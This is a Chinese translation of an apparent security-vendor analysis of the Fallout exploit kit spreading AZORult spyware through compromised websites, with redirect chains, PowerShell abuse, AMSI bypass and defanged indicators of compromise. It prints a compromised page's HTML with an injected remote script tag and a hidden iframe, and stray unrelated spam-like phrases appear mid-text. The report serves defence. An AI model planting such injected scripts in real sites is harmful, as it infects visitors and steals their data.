FALLOUT工具包再现江湖，让你浏览网站时不知不觉中招

摘要

近年来，网络攻击越来越无孔不入，看似平常的活动在攻击者眼中也成为了潜在的攻击机会，作为这一趋势的最新案例，本文将展示攻击者是如何通过人们日常的浏览行为来安装AZORult的。AZORult是一类间谍软件，能从受害者计算机中窃取大量有价值的数据。

此次行动，攻击者结合了几种技术来访问用户机器：

· 使用PowerShell而不是Internet Explorer来执行最终payload，并绕过了Windows中的AMSI保护机制。

· 通过恶意重定向来识别目标计算机中的漏洞，然后动态选择相关技术来获取访问权限。

· 植入AZORult来收集受害者数据。 

介绍

你所认为的“安全”浏览却可能会在不知情的情况下暴露你的个人数据。去年，nao sec团队首次发现了Fallout漏洞利用工具包，该工具包通过在GitHub上的各种漏洞利用工具来武装自己，感染用户。而最近它们把目光转移到了一个新的Flash播放器漏洞——CVE-2018-15982上。

漏洞利用工具包（EK）是嵌入恶意或受损网页的组件，利用易受攻击的客户端应用程序在访问者主机上安装恶意软件。在日本，由于过时的、未打补丁的操作系统和第三方软件的数量相对较多，因此开发工具包通常非常活跃。

自2019年初以来，Fallout漏洞利用工具包一直用于传播GandCrab勒索软件。而最近，它被发现植入了其他类型的勒索软件和如AZORult之类的间谍软件。与其它漏洞攻击工具包使用的传统技术相比，Fallout的感染机制相当不同——传统技术通常保留在浏览器的上下文中，而Fallout则使用PowerShell来运行payload。自今年年初以来，Cybereason团队遭遇了许多与Fallout有关的感染，我们将在下文讲述其中一个案例。

 

Fallout的感染流程

感染过程分析

上述感染流程称为偷渡式下载（drive-by download）。用户浏览恶意或受感染的网页时，恶意代码通过漏洞利用将恶意软件下载到受害者机器上。这种做法相对简单，用户只需浏览网页就能开启感染过程，既不需要做任何额外的操作，也不需要经过用户的同意。

为了达到这一目的，漏洞利用工具包常常会破坏合法的网站，并通过利用各种web漏洞(有时使用XSS)将其感染，再经过一系列网页重定向后将用户导到工具包的登录页面。登陆页面是最后一个恶意页面，它会触发某个漏洞的利用代码。大多数此类网站都是制作成人内容的网站，因为这些网站很热门，能为攻击者带来最大化感染。

通过检查PowerShell的父进程iexplore.exe，我们可以看到受害者在浏览网页时使用的是Internet Explorer。PHP大马

识别用户访问的链接

下图演示了前面提到的重定向过程。

在显示EK登陆页面之前进行的一系列重定向

通过使用WHOIS来检查域名的创建日期记录，我们可以看到该域名是最近注册的，这点是可疑的。以托管在荷兰的“tracpadsforgame [.] info”的WHOIS记录（从DomainTools中获取）为例：

域名：TRACPADSFORGAME [.] INFO

注册表域ID：D503300000129283219-LRMS

注册商WHOIS服务器：whois.namecheap.com

注册商网址：www.namecheap.com

更新日期：2019-02-04

创建日期：2018-08-08

注册日期到期日：2019-08-08

而在以前的攻击行动中，已有研究人员注意到过上述域名。在2月下旬，该域出现在了RIG EK和AZORult的配对组合中。

下面是托管在“tracpadsforgame [.] info”上的恶意重定向的代码片段。此链接在感染时使用，攻击者经常轮换链接。此代码段在一系列重定向中的其中一个页面上。

 

<script>
(function(h,o,t,j,a,r){
h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
h._hjSettings={hjid:623500,hjsv:5};
a=o.getElementsByTagName('head')[0];
r=o.createElement('script');r.async=1;
r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
a.appendChild(r);
})(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');
</script>
</head>
<body class="">
<script type='text/javascript' src='hxxp://cantouchthis[.]xyz' [SANITIZED]></script><iframe οnlοad="window.setTimeout('visits()', 99)" src='about:blank' style='position:absolute; top:22px; left:-2144px;'></iframe>›
<section class="m-above-header">
<div class="container">
<div class="row">
<div class="m-above-header__inner">
<div class="col-lg-6 col-md-7 m-above-header__inner__left">
<ul>
<li><span>Check </span><a href="https://www[.]ccgmining[.]com/profit-calculator.php" class="profit-calc right-arrow">profit calculator <span class="text-arrow-up">»</span></a></li>
<li><a href="tel:"></a></li>
<li><a href="https://www[.]ccgmining[.]com/cdn-cgi/l/email-protection#2e4d41405a4f4d5a6e4d4d49434740474049004d4143"><span class="__cf_email__" data-cfemail="35565a5b4154564175565652585c5b5c5b521b565a58"></span></a></li>
<li><a href="https://www[.]ccgmining[.]com/supporttickets.php" class="support right-arrow">support <span class="text-arrow-up">»</span></a></li>
</ul>

代码的噪声中隐藏了一个恶意iframe标记。iframe会加载恶意域cantouchthis[.]xyz。

加载的cantouchthis[.]xyz页面包含了更多混淆的JavaScript代码。通过清理代码并提取相关的部分，得到如下片段。

JavaScript代码，浏览器指纹识别

在代码的末尾，使用了eval函数。

JavaScript代码中的eval函数

eval函数编译并执行JavaScript代码。从历史上看，它既是JavaScript中最强大的函数，也是被滥用最多的函数。

传递给eval函数的去混淆代码

上面的输出是另一组稍微混淆过的代码，这段代码用于执行一系列浏览器检查，以确定受害者是否在使用某些特定的浏览器，如果不是就略过，如果检查通过，代码将动态生成一个额外的恶意iframe，以便在visits()中进一步重定向用户。下一个Base64字符串解码为hxxp://ad3[.]dogfunnyvideos[.]]xyz/mydoggystylewithyourkitty，这是用户被重定向到的地方。类似的过程可能重复发生，直到到达最终的恶意页面。奇热影视

Cybereason解决方案中看到的解码域

如果漏洞利用工具包对受害者浏览器的检查通过，受害者将被重定向到最终的登录页面，并在此页面选择最相关的漏洞，在本例中是Flash Player的漏洞CVE-2018-15982，然后从相应的GitHub页面下载利用代码。

从GitHub下载漏洞利用

FALLOUT EK的后感染分析

一旦FALLOUT EK访问了受害者的计算机，它就会执行PowerShell作为iexplore.exe的子进程。

在Cybereason解决方案中看到的执行树

Cybereason解决方案检测到的PowerShell恶意实例

PowerShell实例正在运行一个Base64编码的混淆命令，它负责执行最终的payload。

部分解码后的命令，用于执行最终payload

通过使用PowerShell执行最终payload，Fallout能绕过Windows中的反恶意软件扫描接口（AMSI）保护机制，AZORult也由PowerShell脚本植入。

在Cybereason解决方案中看到的恶意进程

AZORult Infostealer是一款间谍软件，可从受损主机收集各种有价值的数据，如比特币钱包、敏感文件、保存的登录数据、Web Cookie等。该恶意软件具有内置的下载程序功能，并且会植入其他的恶意软件。在过去，AZORult则主要是通过EK和malspam广告行动来传递的。

初始感染后，AZORult与其C2服务器通信，能过滤它收集到的任何数据。

AZORult与其C2服务器进行通信

安全建议

· 将所有第三方软件更新为最新版本。如果不需要第三方软件的组件，请考虑将其删除。

· 养成良好的浏览习惯。

结论

漏洞利用工具包并不新鲜，不过我们仍然看到攻击者在感染传递链上下足了功夫，通过结合不同技术、漏洞利用甚至payload来逃避检测，就像在本文中Fallout EK与AZORult的结合一样。

而攻击者还想到了通过破坏高流量的合法网站，使之成为有效的攻击载体，能尽可能地为自己牟利；还通过结合逃避技术和多个恶意重定向来识别漏洞，让EK能找出成功感染的最佳漏洞。

这延续了我们在过去一年看到的一种趋势，即攻击者甚至将常见的活动都变成了潜在的攻击。我们必须问自己的问题是，企业如何抵御利用用户“安全”行为的攻击?此外，我们为员工提供了哪些安全建议来防止此类攻击?

IoC

Payload (AZORult):

SHA-1: 4f2e67981341e6458301328be6d26f0b8e3bffe3

域名:

i4you[.]id

ad3[.]dogfunnyvideos[.]xyz

cantouchthis[.]xyz

tracpadsforgame[.]info

IP:

108[.]61[.]57[.]77

5[.]23[.]49[.]200

185[.]56[.]233[.]186

91[.]235[.]129[.]167